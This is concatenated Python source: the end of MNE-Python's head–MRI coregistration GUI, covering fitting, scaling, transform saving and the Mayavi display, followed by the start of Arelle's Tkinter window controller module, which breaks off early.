x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_matched_points(src_fid, tgt_fid, rotate=True,
translate=False, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = rot
def fit_fiducials(self):
"Find rotation and translation to fit all 3 fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z)
est = fit_matched_points(src_fid, tgt_fid, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:]
def fit_hsp_points(self):
"Find rotation to fit head shapes"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.mri.points - self.mri.nasion
tgt_pts *= self.scale
tgt_pts -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_point_cloud(src_pts, tgt_pts, rotate=True, translate=False,
x0=x0)
self.rot_x, self.rot_y, self.rot_z = rot
def fit_scale_auricular_points(self):
"Find rotation and MRI scaling based on LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
x = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=False,
scale=1, x0=x0, out='params')
self.scale_x = 1. / x[3]
self.rot_x, self.rot_y, self.rot_z = x[:3]
def fit_scale_fiducials(self):
"Find translation, rotation and scaling based on the three fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z, 1. / self.scale_x,)
est = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=True,
scale=1, x0=x0, out='params')
self.scale_x = 1. / est[6]
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:6]
def fit_scale_hsp_points(self):
"Find MRI scaling and rotation to match head shape points"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.mri.points - self.mri.nasion
if self.n_scale_params == 1:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=1, x0=x0)
self.scale_x = 1. / est[3]
else:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x,
1. / self.scale_y, 1. / self.scale_z)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=3, x0=x0)
self.scale_x, self.scale_y, self.scale_z = 1. / est[3:]
self.rot_x, self.rot_y, self.rot_z = est[:3]
def get_scaling_job(self, subject_to):
desc = 'Scaling %s' % subject_to
func = scale_mri
args = (self.mri.subject, subject_to, self.scale)
kwargs = dict(overwrite=True, subjects_dir=self.mri.subjects_dir)
return (desc, func, args, kwargs)
def get_prepare_bem_model_job(self, subject_to):
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_name = 'inner_skull'
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name=bem_name)
if not os.path.exists(bem_file):
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='(.+)')
bem_dir, bem_file = os.path.split(pattern)
m = None
bem_file_pattern = re.compile(bem_file)
for name in os.listdir(bem_dir):
m = bem_file_pattern.match(name)
if m is not None:
break
if m is None:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='*')
err = ("No bem file found; looking for files matching "
"%s" % pattern)
error(err)
bem_name = m.group(1)
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name=bem_name)
# job
desc = 'mne_prepare_bem_model for %s' % subject_to
func = prepare_bem_model
args = (bem_file,)
kwargs = {}
return (desc, func, args, kwargs)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file
Parameters
----------
fname : str
File path.
"""
info = read_trans(fname)
head_mri_trans = info['trans']
self.set_trans(head_mri_trans)
def reset(self):
"""Reset all the parameters affecting the coregistration"""
self.reset_traits(('n_scaling_params', 'scale_x', 'scale_y', 'scale_z',
'rot_x', 'rot_y', 'rot_z', 'trans_x', 'trans_y',
'trans_z'))
def set_trans(self, head_mri_trans):
"""Set rotation and translation parameters from a transformation matrix
Parameters
----------
head_mri_trans : array, shape (4, 4)
Transformation matrix from head to MRI space.
"""
x, y, z = -self.mri_origin[0]
mri_tgt_trans = translation(x, y, z)
head_tgt_trans = np.dot(mri_tgt_trans, head_mri_trans)
x, y, z = self.hsp.nasion[0]
src_hsp_trans = translation(x, y, z)
src_tgt_trans = np.dot(head_tgt_trans, src_hsp_trans)
rot_x, rot_y, rot_z = rotation_angles(src_tgt_trans[:3, :3])
x, y, z = src_tgt_trans[:3, 3]
self.rot_x = rot_x
self.rot_y = rot_y
self.rot_z = rot_z
self.trans_x = x
self.trans_y = y
self.trans_z = z
def save_trans(self, fname):
"""Save the head-mri transform as a fif file
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
trans = self.head_mri_trans
dig = deepcopy(self.hsp.fid_dig)
for i in range(len(dig)):
dig[i]['r'] = apply_trans(trans, dig[i]['r'])
info = {'to': FIFF.FIFFV_COORD_MRI, 'from': FIFF.FIFFV_COORD_HEAD,
'trans': trans, 'dig': dig}
write_trans(fname, info)
class CoregFrameHandler(Handler):
"""Handler that checks for unfinished processes before closing its window
"""
def close(self, info, is_ok):
if info.object.queue.unfinished_tasks:
msg = ("Can not close the window while saving is still in "
"progress. Please wait until all MRIs are processed.")
title = "Saving Still in Progress"
information(None, msg, title)
return False
else:
return True
class CoregPanel(HasPrivateTraits):
model = Instance(CoregModel)
# parameters
reset_params = Button(label='Reset')
n_scale_params = DelegatesTo('model')
scale_step = Float(1.01)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(0.01)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(0.001)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_fid_data = DelegatesTo('model')
has_pts_data = DelegatesTo('model')
# fitting with scaling
fits_hsp_points = Button(label='Fit Head Shape')
fits_fid = Button(label='Fit Fiducials')
fits_ap = Button(label='Fit LPA/RPA')
# fitting without scaling
fit_hsp_points = Button(label='Fit Head Shape')
fit_fid = Button(label='Fit Fiducials')
fit_ap = Button(label='Fit LPA/RPA')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_save = DelegatesTo('model')
prepare_bem_model = Bool(True)
save = Button(label="Save As...")
load_trans = Button
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(VGroup(Item('n_scale_params', label='MRI Scaling',
style='custom', show_label=True,
editor=EnumEditor(values={0: '1:No Scaling',
1: '2:1 Param',
3: '3:3 Params'},
cols=3)),
VGrid(Item('scale_x', editor=laggy_float_editor,
show_label=True, tooltip="Scale along "
"right-left axis",
enabled_when='n_scale_params > 0'),
Item('scale_x_dec',
enabled_when='n_scale_params > 0'),
Item('scale_x_inc',
enabled_when='n_scale_params > 0'),
Item('scale_step', tooltip="Scaling step",
enabled_when='n_scale_params > 0'),
Item('scale_y', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_y_dec',
enabled_when='n_scale_params > 1'),
Item('scale_y_inc',
enabled_when='n_scale_params > 1'),
Label('(Step)'),
Item('scale_z', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_z_dec',
enabled_when='n_scale_params > 1'),
Item('scale_z_inc',
enabled_when='n_scale_params > 1'),
show_labels=False, columns=4),
HGroup(Item('fits_hsp_points',
enabled_when='n_scale_params',
tooltip="Rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance from each digitizer point to the "
"closest MRI point"),
Item('fits_ap',
enabled_when='n_scale_params == 1',
tooltip="While leaving the nasion in "
"place, rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance of the two auricular points"),
Item('fits_fid',
enabled_when='n_scale_params == 1',
tooltip="Move and rotate the digitizer "
"head shape, and scale the MRI so as to "
"minimize the distance of the three "
"fiducials."),
show_labels=False),
'_',
Label("Translation:"),
VGrid(Item('trans_x', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"right-left axis"),
'trans_x_dec', 'trans_x_inc',
Item('trans_step', tooltip="Movement step"),
Item('trans_y', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_y_dec', 'trans_y_inc',
Label('(Step)'),
Item('trans_z', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis"),
'trans_z_dec', 'trans_z_inc',
show_labels=False, columns=4),
Label("Rotation:"),
VGrid(Item('rot_x', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"right-left axis"),
'rot_x_dec', 'rot_x_inc',
Item('rot_step', tooltip="Rotation step"),
Item('rot_y', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_y_dec', 'rot_y_inc',
Label('(Step)'),
Item('rot_z', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis"),
'rot_z_dec', 'rot_z_inc',
show_labels=False, columns=4),
# buttons
HGroup(Item('fit_hsp_points',
enabled_when='has_pts_data',
tooltip="Rotate the head shape (around the "
"nasion) so as to minimize the distance "
"from each head shape point to its closest "
"MRI point"),
Item('fit_ap', enabled_when='has_fid_data',
tooltip="Try to match the LPA and the RPA, "
"leaving the Nasion in place"),
Item('fit_fid', enabled_when='has_fid_data',
tooltip="Move and rotate the head shape so "
"as to minimize the distance between the "
"MRI and head shape fiducials"),
Item('load_trans', enabled_when='has_fid_data'),
show_labels=False),
'_',
Item('fid_eval_str', style='readonly'),
Item('points_eval_str', style='readonly'),
'_',
HGroup(Item('prepare_bem_model'),
Label("Run mne_prepare_bem_model"),
show_labels=False,
enabled_when='n_scale_params > 0'),
HGroup(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if "
"scaling is enabled) the scaled MRI"),
Item('reset_params', tooltip="Reset all "
"coregistration parameters"),
show_labels=False),
Item('queue_feedback', style='readonly'),
Item('queue_current', style='readonly'),
Item('queue_len_str', style='readonly'),
show_labels=False),
kind='panel', buttons=[UndoButton])
def __init__(self, *args, **kwargs):
super(CoregPanel, self).__init__(*args, **kwargs)
# setup save worker
def worker():
while True:
desc, cmd, args, kwargs = self.queue.get()
self.queue_len -= 1
self.queue_current = 'Processing: %s' % desc
# task
try:
cmd(*args, **kwargs)
except Exception as err:
self.error = str(err)
res = "Error in %s"
else:
res = "Done: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % desc
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_src_pts(self):
return self.hsp_pts - self.hsp_fid[0]
@cached_property
def _get_src_fid(self):
return self.hsp_fid - self.hsp_fid[0]
@cached_property
def _get_tgt_origin(self):
return self.mri_fid[0] * self.scale
@cached_property
def _get_tgt_pts(self):
pts = self.mri_pts * self.scale
pts -= self.tgt_origin
return pts
@cached_property
def _get_tgt_fid(self):
fid = self.mri_fid * self.scale
fid -= self.tgt_origin
return fid
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _fit_ap_fired(self):
GUI.set_busy()
self.model.fit_auricular_points()
GUI.set_busy(False)
def _fit_fid_fired(self):
GUI.set_busy()
self.model.fit_fiducials()
GUI.set_busy(False)
def _fit_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_hsp_points()
GUI.set_busy(False)
def _fits_ap_fired(self):
GUI.set_busy()
self.model.fit_scale_auricular_points()
GUI.set_busy(False)
def _fits_fid_fired(self):
GUI.set_busy()
self.model.fit_scale_fiducials()
GUI.set_busy(False)
def _fits_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_scale_hsp_points()
GUI.set_busy(False)
def _n_scale_params_changed(self, new):
if not new:
return
# Make sure that MNE_ROOT environment variable is set
if not assert_env_set(mne_root=True):
err = ("MNE_ROOT environment variable could not be set. "
"You will be able to scale MRIs, but the preparatory mne "
"tools will fail. Please specify the MNE_ROOT environment "
"variable. In Python this can be done using:\n\n"
">>> os.environ['MNE_ROOT'] = '/Applications/mne-2.7.3'")
warning(None, err, "MNE_ROOT Not Set")
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _load_trans_fired(self):
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
subject = self.model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
self.model.load_trans(trans_file)
def _save_fired(self):
if self.n_scale_params:
subjects_dir = self.model.mri.subjects_dir
subject_from = self.model.mri.subject
subject_to = self.model.raw_subject or self.model.mri.subject
else:
subject_to = self.model.mri.subject
# ask for target subject
if self.n_scale_params:
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal')
if ui.result != True:
return
subject_to = mridlg.subject_to
# find bem file to run mne_prepare_bem_model
if self.n_scale_params and self.prepare_bem_model:
bem_job = self.model.get_prepare_bem_model_job(subject_to)
else:
bem_job = None
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file = trans_file + '.fif'
if os.path.exists(trans_file):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
self.model.save_trans(trans_file)
except Exception as e:
error(None, str(e), "Error Saving Trans File")
return
# save the scaled MRI
if self.n_scale_params:
job = self.model.get_scaling_job(subject_to)
self.queue.put(job)
self.queue_len += 1
if bem_job is not None:
self.queue.put(bem_job)
self.queue_len += 1
def _scale_x_dec_fired(self):
step = 1. / self.scale_step
self.scale_x *= step
def _scale_x_inc_fired(self):
self.scale_x *= self.scale_step
def _scale_x_changed(self, old, new):
if self.n_scale_params == 1:
self.scale_y = new
self.scale_z = new
def _scale_y_dec_fired(self):
step = 1. / self.scale_step
self.scale_y *= step
def _scale_y_inc_fired(self):
self.scale_y *= self.scale_step
def _scale_z_dec_fired(self):
step = 1. / self.scale_step
self.scale_x *= step
def _scale_z_inc_fired(self):
self.scale_x *= self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
width=500,
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, scene_width=-1):
"""Create a view for the CoregFrame
Parameters
----------
tabbed : bool
Combine the data source panel and the coregistration panel into a
single panel with tabs.
split : bool
Split the main panels with a movable splitter (good for QT4 but
unnecessary for wx backend).
scene_width : int
Specify a minimum width for the 3d scene (in pixels).
returns
-------
view : traits View
View object for the CoregFrame.
"""
view_options = VGroup(Item('headview', style='custom'), 'view_options',
show_border=True, show_labels=False, label='View')
scene = VGroup(Item('scene', show_label=False,
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', width=500),
view_options)
data_panel = VGroup(VGroup(Item('subject_panel', style='custom'),
label="MRI Subject", show_border=True,
show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2,
values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup('hsp_always_visible',
Label("Always Show Head Shape Points"),
show_labels=False),
Item('fid_panel', style='custom'),
label="MRI Fiducials", show_border=True,
show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup(Item('distance', show_label=True),
'omit_points', 'reset_omit_points',
show_labels=False),
Item('omitted_info', style='readonly',
show_label=False),
label='Head Shape Source (Raw)',
show_border=True, show_labels=False),
show_labels=False, label="Data Source")
coreg_panel = VGroup(Item('coreg_panel', style='custom'),
label="Coregistration", show_border=True,
show_labels=False,
enabled_when="fid_panel.locked")
if split:
main_layout = 'split'
else:
main_layout = 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons)
return view
class ViewOptionsPanel(HasTraits):
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
view = View(VGroup(Item('mri_obj', style='custom', # show_border=True,
label="MRI Head Surface"),
Item('hsp_obj', style='custom', # show_border=True,
label="Head Shape Points")),
title="View Options")
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration
"""
model = Instance(CoregModel, ())
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
coreg_panel = Instance(CoregPanel)
raw_src = DelegatesTo('model', 'hsp')
# Omit Points
distance = Float(5., label="Distance [mm]", desc="Maximal distance for "
"head shape points from MRI in mm")
omit_points = Button(label='Omit Points', desc="Omit head shape points "
"for the purpose of the automatic coregistration "
"procedure.")
reset_omit_points = Button(label='Reset Omission', desc="Reset the "
"omission of head shape points to include all.")
omitted_info = Property(Str, depends_on=['model.hsp.n_omitted'])
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
hsp_always_visible = Bool(False, label="Always Show Head Shape")
# visualization
hsp_obj = Instance(PointObject)
mri_obj = Instance(SurfaceObject)
lpa_obj = Instance(PointObject)
nasion_obj = Instance(PointObject)
rpa_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['hsp_always_visible', 'lock_fiducials'])
view_options = Button(label="View Options")
picker = Instance(object)
view_options_panel = Instance(ViewOptionsPanel)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
panel = FiducialsPanel(model=self.model.mri, headview=self.headview)
return panel
def _coreg_panel_default(self):
panel = CoregPanel(model=self.model)
return panel
def _headview_default(self):
return HeadViewController(scene=self.scene, system='RAS')
def __init__(self, raw=None, subject=None, subjects_dir=None):
super(CoregFrame, self).__init__()
subjects_dir = get_subjects_dir(subjects_dir)
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if subject is not None:
self.model.mri.subject = subject
if raw is not None:
self.model.hsp.file = raw
@on_trait_change('scene.activated')
def _init_plot(self):
self.scene.disable_render = True
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
color = defaults['mri_color']
self.mri_obj = SurfaceObject(points=self.model.mri.points, color=color,
tri=self.model.mri.tris, scene=self.scene)
# on_trait_change was unreliable, so link it another way:
self.model.mri.on_trait_change(self._on_mri_src_change, 'tris')
self.model.sync_trait('scale', self.mri_obj, 'trans', mutual=False)
self.fid_panel.hsp_obj = self.mri_obj
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.lpa_obj = PointObject(scene=self.scene, color=lpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('lpa', self.lpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.lpa_obj, 'trans', mutual=False)
self.nasion_obj = PointObject(scene=self.scene, color=nasion_color,
point_scale=point_scale)
self.model.mri.sync_trait('nasion', self.nasion_obj, 'points',
mutual=False)
self.model.sync_trait('scale', self.nasion_obj, 'trans', mutual=False)
self.rpa_obj = PointObject(scene=self.scene, color=rpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('rpa', self.rpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.rpa_obj, 'trans', mutual=False)
# Digitizer Head Shape
color = defaults['hsp_point_color']
point_scale = defaults['hsp_points_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5)
self.hsp_obj = p
self.model.hsp.sync_trait('points', p, mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer Fiducials
point_scale = defaults['hsp_fid_scale']
opacity = defaults['hsp_fid_opacity']
p = PointObject(scene=self.scene, color=lpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_lpa_obj = p
self.model.hsp.sync_trait('lpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=nasion_color, opacity=opacity,
point_scale=point_scale)
self.hsp_nasion_obj = p
self.model.hsp.sync_trait('nasion', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=rpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_rpa_obj = p
self.model.hsp.sync_trait('rpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
self.picker = on_pick(self.fid_panel._on_pick, type='cell')
self.headview.left = True
self.scene.disable_render = False
self.view_options_panel = ViewOptionsPanel(mri_obj=self.mri_obj,
hsp_obj=self.hsp_obj)
@cached_property
def _get_hsp_visible(self):
return self.hsp_always_visible or self.lock_fiducials
@cached_property
def _get_omitted_info(self):
if self.model.hsp.n_omitted == 0:
return "No points omitted"
elif self.model.hsp.n_omitted == 1:
return "1 point omitted"
else:
return "%i points omitted" % self.model.hsp.n_omitted
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(0, True)
@on_trait_change('model.mri.tris')
def _on_mri_src_change(self):
if self.mri_obj is None:
return
if not (np.any(self.model.mri.points) and np.any(self.model.mri.tris)):
self.mri_obj.clear()
return
self.mri_obj.points = self.model.mri.points
self.mri_obj.tri = self.model.mri.tris
self.mri_obj.plot()
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model.mri.fid_file')
def _on_fid_file_loaded(self):
if self.model.mri.fid_file:
self.fid_panel.locked = True
else:
self.fid_panel.locked = False
def _view_options_fired(self):
self.view_options_panel.edit_traits()
|
CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re, fnmatch
if sys.platform == 'win32' and getattr(sys, 'frozen', False):
# need the .dll directory in path to be able to access Tk and Tcl DLLs efore importinng Tk, etc.
os.environ['PATH'] = os.path.dirname(sys.executable) + ";" + os.environ['PATH']
from tkinter import (Tk, Tcl, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
try:
import syslog
except ImportError:
syslog = None
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.FileSource import saveFile as writeToFile
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewFileFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # mac Python fonts bigger than other apps (terminal, text edit, Word), and to windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
self.iconImage = PhotoImage(file=imgpath + "arelle.gif") # must keep reference during life of window
parent.tk.call('wm', 'iconphoto', parent._w, self.iconImage)
#parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
